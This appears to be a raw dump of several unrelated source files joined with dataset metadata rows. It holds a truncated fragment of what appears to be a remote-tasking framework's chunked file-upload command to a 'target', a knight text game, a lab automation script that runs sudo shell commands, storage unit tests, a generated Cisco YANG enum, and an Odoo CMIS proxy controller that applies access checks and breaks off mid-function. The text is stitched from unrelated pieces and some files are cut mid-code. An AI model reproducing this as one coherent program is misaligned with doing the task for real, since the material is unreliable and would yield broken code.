if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
numBytesToSend = bytesLeft
if numBytesToSend > lpParams['chunksize']:
numBytesToSend = lpParams['chunksize']
startIndex = fileSize - bytesLeft
endIndex = startIndex + numBytesToSend
writeParams = mca.file.cmd.put.WriteParams()
writeParams.data = fileBytes[startIndex:endIndex]
writeParams.chunkIndex = chunkIndex
if numBytesToSend >= bytesLeft:
writeParams.lastData = True
chunkIndex = chunkIndex + 1
rpc = mca.file.cmd.put.tasking.RPC_INFO_WRITE
msg = MarshalMessage()
writeParams.Marshal(msg)
rpc.SetData(msg.Serialize())
rpc.SetMessagingType('message')
res = mcl.tasking.RpcPerformCall(rpc)
if res != mcl.target.CALL_SUCCEEDED:
mcl.tasking.RecordModuleError(res, 0, mca.file.cmd.put.errorStrings)
return False
newBytesLeft = bytesLeft
while newBytesLeft == bytesLeft:
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
time.sleep(1)
newBytesLeft = int(mcl.tasking.env.GetValue(mca.file.cmd.put.LP_ENV_BYTES_LEFT))
bytesLeft = newBytesLeft
while not mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_PUT_COMPLETE):
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
time.sleep(1)
if not lpParams['permanent']:
mcl.tasking.TaskGoToBackground()
while not mcl.CheckForStop():
time.sleep(1)
return mcl.tasking.TaskSetStatus(mcl.target.CALL_SUCCEEDED)
if __name__ == '__main__':
import sys
if TaskingMain(sys.argv[1]) != True:
sys.exit(-1) | unlicense | -8,070,547,693,328,371,000 | 44.289474 | 123 | 0.611361 | false |
helewonder/knightgame | wargame/game.py | 1 | 3956 | from hut import Hut, create_unit
from functions import print_bold, print_dotted_line, show_health, \
print_wave_line
from knight import Knight
from uniterror import HutNotNumberError, HutOutRangeError
class OrGame():
"""
The Game Class , mainly
"""
def __init__(self, hut_numbers=5):
"""get the game ready with scenario ready, default have 5huts.
:param hut_numbers: in the game, how many huts
:type hut_numbers: int
"""
self.acquired_all_huts = False
self.huts = []
self.player = None
self.hut_numbers = hut_numbers
@property
def get_occupants(self):
"""Show all huts with it's occupant
:return: the message each hut with occupant
:rtype: basestring
"""
msg = "["
for hut in self.huts:
msg += str(hut.number) + ":" + hut.get_occupant_type + ", "
msg += '\b\b]'
return msg
def _process_user_choice(self):
verifying_choice = True
idx = 0
print_dotted_line()
print("Current Occupants:\n\t%s" % self.get_occupants)
print_dotted_line()
while verifying_choice:
user_choice = input(
"Choose a hut number to enter(1~" + str(
self.hut_numbers) + "):")
try:
if not user_choice.isdigit():
raise HutNotNumberError(
"Your input '{}' is not number.".format(user_choice))
idx = int(user_choice)
if idx > self.hut_numbers or idx < 0:
raise HutOutRangeError(
"input not in range(1~" + str(self.hut_numbers) + ")")
except HutNotNumberError as e:
print_wave_line()
print(e)
print(e.error_message)
print_wave_line()
continue
except HutOutRangeError as e:
print_wave_line()
print(e)
print(e.error_message)
print_wave_line()
continue
if self.huts[idx - 1].is_acquired:
print(
"You have already acquired this hut. Try again",
"<Info:You can NOT get healed in already acquired hut.>"
)
else:
verifying_choice = False
return idx
def play(self):
"""
Workhorse method to play the game....
Create a Knight instance, create huts and preoccupy them with a game
Character instance (or leave empty)
"""
self.setup_game_scenario()
while not self.acquired_all_huts:
idx = self._process_user_choice()
self.player.acquire_hut(self.huts[idx - 1])
if self.player.health_meter <= 0:
print("You Lose :( Better luck next time")
break
for hut in self.huts:
if not hut.is_acquired:
break
else:
self.acquired_all_huts = True
if self.acquired_all_huts:
print_bold("You Win!!! Congratulations!!!!!!")
def setup_game_scenario(self):
"""
Create player and huts and then randomly pre-occupy huts...
"""
self.player = Knight("Sir Foo")
for number in range(self.hut_numbers):
self.huts.append(Hut(number + 1, create_unit()))
self._show_mission()
# print_bold("Current Occupants:", self.get_occupants)
show_health(self.player, bold=True, end='\n')
@staticmethod
def _show_mission():
print_dotted_line()
print_bold("Welcome to Play the Knight Game!", end='\n')
print_dotted_line()
print_bold("Mission:")
print("\t1. Defeat the enemy in any hut")
print("\t2. Bring all huts in the village under your contral")
| mit | -2,352,176,094,657,368,000 | 30.903226 | 78 | 0.523509 | false |
Mach33Labs/labautomation | github.py | 1 | 5717 | #!/usr/bin/python
import datetime
import fcntl
import github3
import gzip
import json
import os
import re
import select
import socket
import subprocess
import sys
import time
import mysql.connector
TARGET_VM = 'devosa'
TARGET_IP_BLOCK = '192.168.53.0/24'
with open(os.path.expanduser('~/.github_automation'), 'r') as f:
config = json.loads(f.read())
ISSUE_URL_RE = re.compile('https://api.github.com/repos/(.*)/(.*)/issues/(.*)')
def github_comment(issue_url, comment):
if not issue_url:
return
g = github3.login(config['github_user'], config['github_password'])
m = ISSUE_URL_RE.match(issue_url)
if not m:
print 'Could not parse issue URL!'
return
issue = g.issue(m.group(1), m.group(2), int(m.group(3)))
issue.create_comment(comment)
def process(job):
ostrich_sha = job['sha']
if job['project'] != 'ostrich':
ostrich_sha = 'master'
state = {}
with open('state.json.%s' % job['flavour'], 'r') as f:
state = json.loads(f.read())
state['complete']['osa-branch'] = job['branch']
state['complete']['ironic-ip-block'] = TARGET_IP_BLOCK
with open('state.json', 'w') as f:
f.write(json.dumps(state, indent=4, sort_keys=True))
short_branch = job['branch'].replace('stable/', '')
now = datetime.datetime.now()
job_id = ('%04d%02d%02d-%02d%02d-%s-%s-%s'
%(now.year, now.month, now.day, now.hour, now.minute,
job['project'], short_branch, job['sha']))
job['short_branch'] = short_branch
job['job_id'] = job_id
job['timestamp'] = job['timestamp'].isoformat()
with open('job.json', 'w') as f:
f.write(json.dumps(job, indent=4, sort_keys=True))
with gzip.open('%s.log.gz' % job_id, 'w') as f:
rc = execute('sudo ./reset_osa.sh %s %s %s %s %s'
%(TARGET_VM, job['distro'], ostrich_sha, job_id,
job['project']), f)
return (rc, job_id)
def execute(command, logfile):
print('Running %s' % command)
obj = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
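    # Switch the child's stdout/stderr to non-blocking mode so the select()
    # loop below can interleave both streams without blocking on a pipe
    # that has no data yet.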
flags = fcntl.fcntl(obj.stdout, fcntl.F_GETFL)
fcntl.fcntl(obj.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK)
flags = fcntl.fcntl(obj.stderr, fcntl.F_GETFL)
fcntl.fcntl(obj.stderr, fcntl.F_SETFL, flags | os.O_NONBLOCK)
obj.stdin.close()
while obj.poll() is None:
readable, _, _ = select.select([obj.stderr, obj.stdout], [], [], 10)
for f in readable:
d = os.read(f.fileno(), 10000)
sys.stdout.write(d)
logfile.write(d)
logfile.flush()
print('... process complete')
returncode = obj.returncode
print('... exit code %d' % returncode)
return returncode
def main():
while True:
conn = mysql.connector.connect(**config['db'])
cursor = conn.cursor(dictionary=True, buffered=True)
cursor.execute('select * from jobs where processed=0 and '
'machine is null order by timestamp;')
if cursor.rowcount == 0:
print '%s No work, sleeping' % datetime.datetime.now()
time.sleep(60)
continue
job = cursor.fetchone()
cursor.execute('update jobs set machine=%(machine)s where '
'uuid=%(uuid)s and machine is null;',
{
'machine': socket.gethostname(),
'uuid': job['uuid']
})
if cursor.rowcount == 0:
print 'My job got stolen (id %s)!' % job['uuid']
continue
cursor.execute('commit;')
start_time = time.time()
rc, job_id = process(job)
end_time = time.time()
conn = mysql.connector.connect(**config['db'])
cursor = conn.cursor(dictionary=True, buffered=True)
cursor.execute('update jobs set processed=1, outcome=%(outcome)s, '
'log_url=%(log_url)s '
'where uuid=%(uuid)s;',
{
'outcome': rc,
'log_url': ('http://molokai.stillhq.com/lab/logs/%s/'
% job_id),
'uuid': job['uuid']
})
cursor.execute('commit;')
cursor.execute('select * from jobs where event_uuid=%(event_uuid)s;',
{'event_uuid': job['event_uuid']})
report = []
unrun = 0
for job in cursor:
outcome = ''
if str(job['outcome']) == '0':
outcome = 'passed'
elif job['outcome']:
outcome = 'failed'
else:
unrun += 1
outcome = 'not yet run'
logs = ''
if job['log_url']:
logs = ', logs at %s' % job['log_url']
report.append('%s on %s %s%s' %(job['branch'], job['distro'],
outcome, logs))
comment = 'Tests run on %s:' % job['sha']
for r in report:
comment += ('\n %s' % r)
print 'Unrun: %d' % unrun
print comment
if unrun == 0:
github_comment(job['issue_url'], comment)
#if rc != 0:
# print 'Failed test run, stopping to debug'
# sys.exit(1)
if job['type'] == 'manual':
print 'Manual job, stopping for user to operate'
sys.exit(1)
if __name__ == '__main__':
main()
| apache-2.0 | 634,645,749,023,385,500 | 29.902703 | 80 | 0.509183 | false |
xapi-project/sm | tests/test_HBASR.py | 1 | 8516 | import mock
import HBASR
import unittest
import xmlrpclib
import xs_errors
import os
import SR
import xml.dom.minidom
import util
def mock_init(self):
pass
def imp_fake_probe():
dom = xml.dom.minidom.Document()
hbalist = dom.createElement("HBAInfoList")
dom.appendChild(hbalist)
for host in ["host1", "host2"]:
hbainfo = dom.createElement("HBAInfo")
hbalist.appendChild(hbainfo)
sname = "nvme_special"
entry = dom.createElement("model")
hbainfo.appendChild(entry)
textnode = dom.createTextNode(sname)
entry.appendChild(textnode)
nname = "0x200000e08b18208b"
nname = util.make_WWN(nname)
entry = dom.createElement("nodeWWN")
hbainfo.appendChild(entry)
textnode = dom.createTextNode(nname)
entry.appendChild(textnode)
port = dom.createElement("Port")
hbainfo.appendChild(port)
pname = "0x500143802426baf4"
pname = util.make_WWN(pname)
entry = dom.createElement("portWWN")
port.appendChild(entry)
textnode = dom.createTextNode(pname)
entry.appendChild(textnode)
state = "toast"
entry = dom.createElement("state")
port.appendChild(entry)
textnode = dom.createTextNode(state)
entry.appendChild(textnode)
entry = dom.createElement("deviceName")
port.appendChild(entry)
textnode = dom.createTextNode("/sys/class/scsi_host/%s" % host)
entry.appendChild(textnode)
return dom.toxml()
def fake_probe(self):
return imp_fake_probe()
class TestHBASR(unittest.TestCase):
@mock.patch('HBASR.HBASR.__init__', mock_init)
def test_handles(self):
sr = HBASR.HBASR()
self.assertFalse(sr.handles("blah"))
self.assertTrue(sr.handles("hba"))
@mock.patch('HBASR.HBASR.__init__', mock_init)
def test_load(self):
sr_uuid = 123
sr = HBASR.HBASR()
sr.dconf = {}
sr.load(sr_uuid)
self.assertEqual(sr.sr_vditype, 'phy')
self.assertEqual(sr.type, 'any')
self.assertFalse(sr.attached)
self.assertEqual(sr.procname, "")
self.assertEqual(sr.devs, {})
sr.dconf = {"type": None}
sr.load(sr_uuid)
self.assertEqual(sr.sr_vditype, 'phy')
self.assertEqual(sr.type, 'any')
self.assertFalse(sr.attached)
self.assertEqual(sr.procname, "")
self.assertEqual(sr.devs, {})
sr.dconf = {"type": "blah"}
sr.load(sr_uuid)
self.assertEqual(sr.sr_vditype, 'phy')
self.assertEqual(sr.type, 'blah')
self.assertFalse(sr.attached)
self.assertEqual(sr.procname, "")
self.assertEqual(sr.devs, {})
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('HBASR.devscan.adapters', autospec=True)
@mock.patch('HBASR.scsiutil.cacheSCSIidentifiers', autospec=True)
    def test__init_hbadict_already_init(self, mock_cacheSCSIidentifiers,
mock_devscan_adapters):
sr = HBASR.HBASR()
sr.hbas = {"Pitt": "The elder"}
sr._init_hbadict()
self.assertEqual(mock_cacheSCSIidentifiers.call_count, 0)
self.assertEqual(mock_devscan_adapters.call_count, 0)
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('HBASR.devscan.adapters', autospec=True)
@mock.patch('HBASR.scsiutil.cacheSCSIidentifiers', autospec=True)
def test__init_hbadict(self, mock_cacheSCSIidentifiers,
mock_devscan_adapters):
sr = HBASR.HBASR()
sr.type = "foo"
mock_devscan_adapters.return_value = {"devs": "toaster", "adt": []}
sr._init_hbadict()
mock_devscan_adapters.assert_called_with(filterstr="foo")
self.assertEqual(mock_cacheSCSIidentifiers.call_count, 0)
self.assertEqual(mock_devscan_adapters.call_count, 1)
self.assertEqual(sr.hbas, [])
self.assertEqual(sr.hbadict, "toaster")
mock_cacheSCSIidentifiers.call_count = 0
mock_devscan_adapters.call_count = 0
mock_cacheSCSIidentifiers.return_value = "123445"
sr2 = HBASR.HBASR()
sr2.type = "foo"
mock_devscan_adapters.return_value = {"devs": "toaster",
"adt": ["dev1", "dev2"]}
sr2._init_hbadict()
self.assertEqual(mock_cacheSCSIidentifiers.call_count, 1)
self.assertEqual(mock_devscan_adapters.call_count, 1)
self.assertEqual(sr2.hbas, ["dev1", "dev2"])
self.assertEqual(sr2.hbadict, "toaster")
self.assertTrue(sr2.attached)
self.assertEqual(sr2.devs, "123445")
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('LVHDoHBASR.xs_errors.XML_DEFS',
"drivers/XE_SR_ERRORCODES.xml")
@mock.patch('HBASR.HBASR._probe_hba', autospec=True)
@mock.patch('HBASR.xml.dom.minidom.parseString', autospec=True)
def test__init_hbahostname_assert(self, mock_parseString, mock_probe_hba):
sr = HBASR.HBASR()
mock_probe_hba.return_value = "blah"
mock_parseString.side_effect = Exception("bad xml")
with self.assertRaises(SR.SROSError) as cm:
sr._init_hba_hostname()
self.assertEqual(str(cm.exception),
"Unable to parse XML "
"[opterr=HBA Host WWN scanning failed]")
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('HBASR.HBASR._probe_hba', fake_probe)
def test__init_hbahostname(self):
sr = HBASR.HBASR()
res = sr._init_hba_hostname()
self.assertEqual(res, "20-00-00-e0-8b-18-20-8b")
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('LVHDoHBASR.xs_errors.XML_DEFS',
"drivers/XE_SR_ERRORCODES.xml")
@mock.patch('HBASR.HBASR._probe_hba', autospec=True)
@mock.patch('HBASR.xml.dom.minidom.parseString', autospec=True)
def test__init_hbas_assert(self, mock_parseString, mock_probe_hba):
sr = HBASR.HBASR()
mock_probe_hba.return_value = "blah"
mock_parseString.side_effect = Exception("bad xml")
with self.assertRaises(SR.SROSError) as cm:
sr._init_hbas()
self.assertEqual(str(cm.exception),
"Unable to parse XML "
"[opterr=HBA scanning failed]")
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('HBASR.HBASR._probe_hba', fake_probe)
def test__init_hbas(self):
sr = HBASR.HBASR()
res = sr._init_hbas()
self.assertEqual(res, {'host2': '50-01-43-80-24-26-ba-f4',
'host1': '50-01-43-80-24-26-ba-f4'})
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('LVHDoHBASR.xs_errors.XML_DEFS',
"drivers/XE_SR_ERRORCODES.xml")
@mock.patch('HBASR.util.pread', autospec=True)
def test__probe_hba_assert(self, mock_pread):
sr = HBASR.HBASR()
mock_pread.side_effect = Exception("bad")
with self.assertRaises(SR.SROSError) as cm:
sr._probe_hba()
self.assertEqual(str(cm.exception),
"Unable to parse XML "
"[opterr=HBA probe failed]")
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('LVHDoHBASR.xs_errors.XML_DEFS',
"drivers/XE_SR_ERRORCODES.xml")
@mock.patch('HBASR.util.pread', autospec=True)
@mock.patch('HBASR.util.listdir', autospec=True)
def test__probe_hba(self, mock_listdir, mock_pread):
sr = HBASR.HBASR()
mock_listdir.return_value = iter(["host1", "host2"])
# Output of preads sliced by _probe_hba to remove newlines.
mock_pread.side_effect = iter(["nvme_special\n",
"0x200000e08b18208b\n",
"0x500143802426baf4\n",
"toast\n",
"nvme_special\n",
"0x200000e08b18208b\n",
"0x500143802426baf4\n",
"toast\n"])
res = sr._probe_hba()
self.assertEqual(res, imp_fake_probe())
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('HBASR.HBASR._mpathHandle', autospec=True)
def test_attach(self, mock_mpath):
sr = HBASR.HBASR()
sr.attach(1234)
self.assertEqual(mock_mpath.call_count, 1)
| lgpl-2.1 | -5,508,638,655,393,202,000 | 35.706897 | 78 | 0.590535 | false |
abhikeshav/ydk-py | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_aaa_locald_cfg.py | 1 | 1133 | """ Cisco_IOS_XR_aaa_locald_cfg
This module contains a collection of YANG definitions
for Cisco IOS\-XR aaa\-locald package configuration.
This YANG module augments the
Cisco\-IOS\-XR\-aaa\-lib\-cfg
module with configuration data.
Copyright (c) 2013\-2015 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class AaaLocaldTaskClassEnum(Enum):
"""
AaaLocaldTaskClassEnum
Aaa locald task class
.. data:: READ = 0
Permits read operation for a Task ID
.. data:: WRITE = 1
Permits write operation for a Task ID
.. data:: EXECUTE = 2
Permits execute operation for a Task ID
.. data:: DEBUG = 3
Permits debug operation for a Task ID
"""
READ = 0
WRITE = 1
EXECUTE = 2
DEBUG = 3
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_locald_cfg as meta
return meta._meta_table['AaaLocaldTaskClassEnum']
| apache-2.0 | -94,935,661,741,093,040 | 16.166667 | 86 | 0.677846 | false |
acsone/alfodoo | cmis_web_proxy/controllers/cmis.py | 1 | 18684 | # Copyright 2016 ACSONE SA/NV (<http://acsone.eu>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
import json
import logging
import urlparse
import werkzeug
from odoo import _, http
from odoo.http import request
from odoo.exceptions import AccessError
from odoo.addons.web.controllers import main
_logger = logging.getLogger(__name__)
try:
import requests
except ImportError:
_logger.debug('Cannot `import requests`.')
CMIS_PROXY_PATH = '/cmis/1.1/browser'
READ_ACCESS_CMIS_ACTIONS = set([
"query",
])
WRITE_ACCESS_CMIS_ACTIONS = set([
"createRelationship",
# "createPolicy", method at repository level: not supported
# "createItem", method at repository level: not supported
"bulkUpdate",
# "createType", method at repository level: not supported
# "updateType", method at repository level: not supported
"createDocument",
"createFolder",
"createDocumentFromSource",
# "createPolicy", method at repository level: not supported
"update",
"setContent",
"checkOut",
"cancelCheckOut",
"checkIn",
# "applyPolicy", method at repository level: not supported
# "applyACL", method at repository level: not supported
])
UNLINK_ACCESS_CMIS_ACTIONS = set([
"delete",
"deleteContent",
"removeObjectFromFolder",
# "removePolicy", method at repository level: not supported
# "deleteType", method at repository level: not supported
])
READ_ACCESS_ALLOWABLE_ACTIONS = set([
"canGetDescendants",
"canGetChildren",
"canGetFolderParent",
"canGetObjectParents",
"canGetProperties",
"canGetContentStream",
"canGetAllVersions",
"canGetObjectRelationships",
"canGetAppliedPolicies",
"canGetACL",
])
WRITE_ACCESS_ALLOWABLE_ACTIONS = set([
"canCreateDocument",
"canCreateFolder",
# "canCreatePolicy",
"canCreateRelationship",
"canUpdateProperties",
"canMoveObject",
"canSetContentStream",
"canAddObjectToFolder",
"canCheckOut",
"canCancelCheckOut",
"canCheckIn",
# "canApplyPolicy",
# "canApplyACL",
])
UNLINK_ACCESS_ALLOWABLE_ACTIONS = set([
"canRemoveObjectFromFolder",
"canDeleteObject",
"canDeleteContentStream",
"canDeleteTree",
# "canRemovePolicy",
])
CMSI_ACTIONS_OPERATION_MAP = {}
for a in READ_ACCESS_CMIS_ACTIONS:
CMSI_ACTIONS_OPERATION_MAP[a] = 'read'
for a in WRITE_ACCESS_CMIS_ACTIONS:
CMSI_ACTIONS_OPERATION_MAP[a] = 'write'
for a in UNLINK_ACCESS_CMIS_ACTIONS:
CMSI_ACTIONS_OPERATION_MAP[a] = 'unlink'
def gen_dict_extract(key, var):
""" This method is used to recusrively find into a json structure (dict)
all values of a given key
credits: http://stackoverflow.com/questions/9807634/
find-all-occurences-of-a-key-in-nested-python-dictionaries-and-lists
"""
if hasattr(var, 'items'):
for k, v in var.items():
if k == key:
yield v
if isinstance(v, dict):
for result in gen_dict_extract(key, v):
yield result
elif isinstance(v, list):
for d in v:
for result in gen_dict_extract(key, d):
yield result
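# Minimal usage sketch for gen_dict_extract (illustrative data, not a
# real CMIS response):
#
#     data = {'objects': [{'object': {'allowableActions': {'canDelete': True}}}]}
#     list(gen_dict_extract('allowableActions', data))
#     # -> [{'canDelete': True}]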
class CmisProxy(http.Controller):
@property
def _cmis_proxy_base_url(self):
return urlparse.urljoin(request.httprequest.host_url, CMIS_PROXY_PATH)
@classmethod
def _clean_url_in_dict(cls, values, original, new):
"""Replace all occurences of the CMIS container url in the json
returned by a call to the CMIS container by the one of the proxy"""
if original.endswith('/'):
original = original[:-1]
for k, v in values.items():
if isinstance(v, dict):
cls._clean_url_in_dict(v, original, new)
elif hasattr(v, 'replace'):
values[k] = v.replace(original, new)
def _check_access_operation(self, model_inst, operation):
"""
Check if the user has the appropriate rights to perform the operation.
The default is to check the access rights and access rules on the
model instance. This behaviour can be adapted by defining the method
''_check_cmis_access_operation'' on the model.
::
@api.multi
def _check_cmis_access_operation(self, operation, field_name=None):
if my_true_condition:
return 'allow'
if my_false_condition:
return 'deny'
return 'default'
The expected result must be in ('allow', 'deny', 'default').
* allow: Access granted
* deny: Access Denied
* default: The current method will check the access rights and access
rules
"""
try:
if hasattr(model_inst, '_check_cmis_access_operation'):
res = model_inst._check_cmis_access_operation(operation, None)
if res not in ('allow', 'deny', 'default'):
raise ValueError("_check_cmis_access_operation result "
"must be in ('allow', 'deny', 'default')")
if res != 'default':
return res == 'allow'
model_inst.check_access_rights(operation)
model_inst.check_access_rule(operation)
except AccessError:
return False
return True
def _apply_permissions_mapping(self, value, headers, proxy_info,
model_inst=None):
"""This method modify the defined allowableActions returned by the
CMIS container to apply the Odoo operation policy defined of the
model instance
"""
if not model_inst:
return
all_allowable_actions = [aa for aa in gen_dict_extract(
'allowableActions', value)]
if not all_allowable_actions:
return
can_read = self._check_access_operation(model_inst, 'read')
can_write = self._check_access_operation(model_inst, 'write')
can_unlink = self._check_access_operation(model_inst, 'unlink')
for allowable_actions in all_allowable_actions:
for action, val in allowable_actions.items():
allowed = False
if action in READ_ACCESS_ALLOWABLE_ACTIONS:
allowed = can_read and val
elif action in WRITE_ACCESS_ALLOWABLE_ACTIONS:
allowed = can_write and val
elif action in UNLINK_ACCESS_ALLOWABLE_ACTIONS:
allowed = can_unlink and val
allowable_actions[action] = allowed
def _sanitize_headers(self, headers):
for key in headers:
if key.lower() == 'transfer-encoding':
headers[key] = None
def _prepare_json_response(self, value, headers, proxy_info,
model_inst=None):
cmis_location = proxy_info['location']
self._clean_url_in_dict(value,
urlparse.urlparse(cmis_location).geturl(),
proxy_info['proxy_location'])
if proxy_info['apply_odoo_security']:
self._apply_permissions_mapping(
value, headers, proxy_info, model_inst)
self._sanitize_headers(headers)
response = werkzeug.Response(
json.dumps(value), mimetype='application/json',
headers=headers)
return response
@classmethod
def _get_redirect_url(cls, proxy_info, url_path):
cmis_location = proxy_info['location']
return urlparse.urljoin(cmis_location, url_path)
def _forward_get_file(self, url, proxy_info, params):
"""Method called to retrieved the content associated to a CMIS object.
The content is streamed between the CMIS container and the caller to
avoid to suck the server memory
:return: :class:`Response <Response>` object
:rtype: werkzeug.Response
"""
r = requests.get(
url, params=params,
stream=True,
auth=(proxy_info['username'], proxy_info['password']))
r.raise_for_status()
headers = dict(r.headers.items())
self._sanitize_headers(headers)
return werkzeug.Response(
r, headers=headers,
direct_passthrough=True)
def _forward_get(self, url_path, proxy_info, model_inst, params):
"""
:return: :class:`Response <Response>` object
:rtype: werkzeug.Response
"""
url = self._get_redirect_url(proxy_info, url_path)
if params.get('cmisselector') == 'content':
return self._forward_get_file(url, proxy_info, params)
r = requests.get(
url, params=params,
auth=(proxy_info['username'], proxy_info['password']))
r.raise_for_status()
if r.text:
return self._prepare_json_response(
r.json(), dict(r.headers.items()), proxy_info, model_inst)
else:
response = werkzeug.Response()
return response
def _forward_post(self, url_path, proxy_info, model_inst, params):
"""The CMIS Browser binding is designed to be queried from the browser
Therefore, the parameters in a POST are expected to be submitted as
HTTP multipart forms. Therefore each parameter in the request is
forwarded as a part of a multipart/form-data.
:return: :class:`Response <Response>` object
:rtype: werkzeug.Response
"""
files = {}
if 'content' in params:
# we are in a mulitpart form data'
content = params.pop('content')
files['content'] = (
content.filename,
content.stream,
content.mimetype
)
for k, v in params.items():
# no filename for parts dedicated to HTTP Form data
files[k] = (None, v, 'text/plain;charset=utf-8')
url = self._get_redirect_url(proxy_info, url_path)
r = requests.post(url, files=files,
auth=(
proxy_info['username'], proxy_info['password']))
r.raise_for_status()
if r.text:
return self._prepare_json_response(
r.json(), dict(r.headers.items()), proxy_info, model_inst)
else:
response = werkzeug.Response()
return response
def _check_provided_token(self, cmis_path, proxy_info, params):
""" Check that a token is present in the request or in the http
headers and both are equal.
:return: the token value if checks are OK, False otherwise.
"""
token = request.httprequest.headers.get('Authorization')
if token:
token = token.replace('Bearer', '').strip()
else:
token = (params.get('token') or '').strip()
if 'token' in params:
params.pop('token')
if not token:
_logger.info("Tokens not provided in headers or request params")
return False
return token
def _decode_token(self, cmis_path, proxy_info, params,
token):
"""Return the Odoo object referenced by the token and the field name
for which the query is done
:return: a tuple (Odoo model instance if exists and user has at least
read access or False, field_name)
"""
token = json.loads(token)
model_name = token.get('model')
false_result = False, False
res_id = token.get('res_id')
if model_name not in request.env:
_logger.info("Invalid model name in token (%s)", model_name)
return false_result
model = request.env[model_name]
if not model.check_access_rights('read', raise_exception=False):
_logger.info("User has no read access on model %s", model_name)
return false_result
model_inst = model.browse(res_id)
if not model_inst.exists():
_logger.info("The referenced model doesn't exist or the user has "
"no read access (%s, %s)", model, res_id)
return false_result
return model_inst, token.get('field_name')
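    # Token payload sketch, inferred from the keys read in _decode_token
    # above (model and field names are illustrative):
    #
    #     {"model": "res.partner", "res_id": 42, "field_name": "cmis_folder"}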
def _check_cmis_content_access(self, cmis_path, proxy_info, params,
model_inst, field_name):
"""Check that the CMIS content referenced into the request is the
same as or a child of the one linked to the odoo model instance.
:return: True if check is Ok False otherwise
"""
token_cmis_objectid = getattr(model_inst, field_name)
if not token_cmis_objectid:
_logger.info("The referenced model doesn't reference a CMIS "
"content (%s, %s)", model_inst._name, model_inst.id)
return False
request_cmis_objectid = params.get('renderedObjectId')
if request_cmis_objectid:
# If the proxy is called to render a cmis content, we need to check
# the original objectId since the one provided by the rendition
# service has no paths
params.pop('renderedObjectId')
else:
request_cmis_objectid = params.get('objectId')
repo = proxy_info['cmis_repository']
if not request_cmis_objectid:
# get the CMIS object id from cmis_path
cmis_content = repo.getObjectByPath(cmis_path)
request_cmis_objectid = cmis_content.getObjectId()
if request_cmis_objectid == token_cmis_objectid:
# the operation is on the CMIS content linked to the Odoo model
# instance
return True
cmis_object = repo.getObject(request_cmis_objectid)
# We can't use a CMIS query to check if a node is in the expected
# tree since the indexation is asynchronous. In place of a simple
# query we check if one of the paths of the node linked to the Odoo
# content instance is in one of the node paths of the requested
# cmis_object
child_paths = cmis_object.getPaths()
parent_paths = repo.getObject(token_cmis_objectid).getPaths()
for p in parent_paths:
for cp in child_paths:
if p in cp:
return True
_logger.info("%s is not a child of %s", request_cmis_objectid,
token_cmis_objectid)
return False
def _check_content_action_access(self, cmis_path, proxy_info, params,
model_inst):
"""Check that the User has de required Permissioon on the Odoo model
instance to di the expected CMIS action
"""
cmisaction = params.get('cmisaction')
if not cmisaction:
return True
operation = CMSI_ACTIONS_OPERATION_MAP.get(cmisaction)
if not operation:
_logger.info("CMIS action %s not supported", cmisaction)
return False
if not self._check_access_operation(model_inst, operation):
_logger.info("User don't have the access right for operation %s "
"on %s to execute the CMIS action %s", operation,
model_inst.name_get()[0][1], cmisaction)
return False
return True
def _check_access(self, cmis_path, proxy_info, params):
"""This method check that the user can access to the requested CMIS
content.
        Security checks applied when the proxy mode is activated:
1. Requests from the client must provide a token (in the header or
as param of the request).
If no security token is provided in this case, the access is denied.
2. The Odoo object referenced by the token (the token is build as
'model.name' + '_' + 'instance_id') must exist.
3. The user must have read access to the object referenced by the token
4. If a cmis_path or object_id is provided by the request, the
        referenced CMIS content must be a child of, or equal to, the node
        referenced by the Odoo object from the token
5. If a cmisaction is provided by the request, a check is done to
ensure that the user has the required privileges in Odoo
"""
# check token conformity
token = self._check_provided_token(cmis_path, proxy_info, params)
if not token:
raise AccessError(_("Bad request"))
# check access to object from token
model_inst, field_name = self._decode_token(
cmis_path, proxy_info, params, token)
if not model_inst:
raise AccessError(_("Bad request"))
        # check if the CMIS object in the request is the one referenced on
# model_inst or a child of this one
if not cmis_path and 'objectId' not in params:
# The request is not for an identified content
return model_inst
if not self._check_cmis_content_access(
cmis_path, proxy_info, params, model_inst, field_name):
raise AccessError(_("Bad request"))
if not self._check_content_action_access(
cmis_path, proxy_info, params, model_inst):
raise AccessError(_("Bad request"))
return model_inst
@http.route([
CMIS_PROXY_PATH + '/<int:backend_id>',
CMIS_PROXY_PATH + '/<int:backend_id>/<path:cmis_path>'
], type='http', auth="user", csrf=False, methods=['GET', 'POST'])
@main.serialize_exception
def call_cmis_services(self, backend_id, cmis_path="", **kwargs):
"""Call at the root of the CMIS repository. These calls are for
requesting the global services provided by the CMIS Container
"""
        # proxy_info is information available from the cache without loading
# the cmis.backend from the database
proxy_info = request.env['cmis.backend'].get_proxy_info_by_id(
backend_id)
method = request.httprequest.method
model_inst = False
if proxy_info.get('apply_odoo_security'):
model_inst = self._check_access(cmis_path, proxy_info, kwargs)
if method not in ['GET', 'POST']:
raise AccessError(
_("The HTTP METHOD %s is not supported by CMIS") % method)
if method == 'GET':
method = self._forward_get
elif method == 'POST':
method = self._forward_post
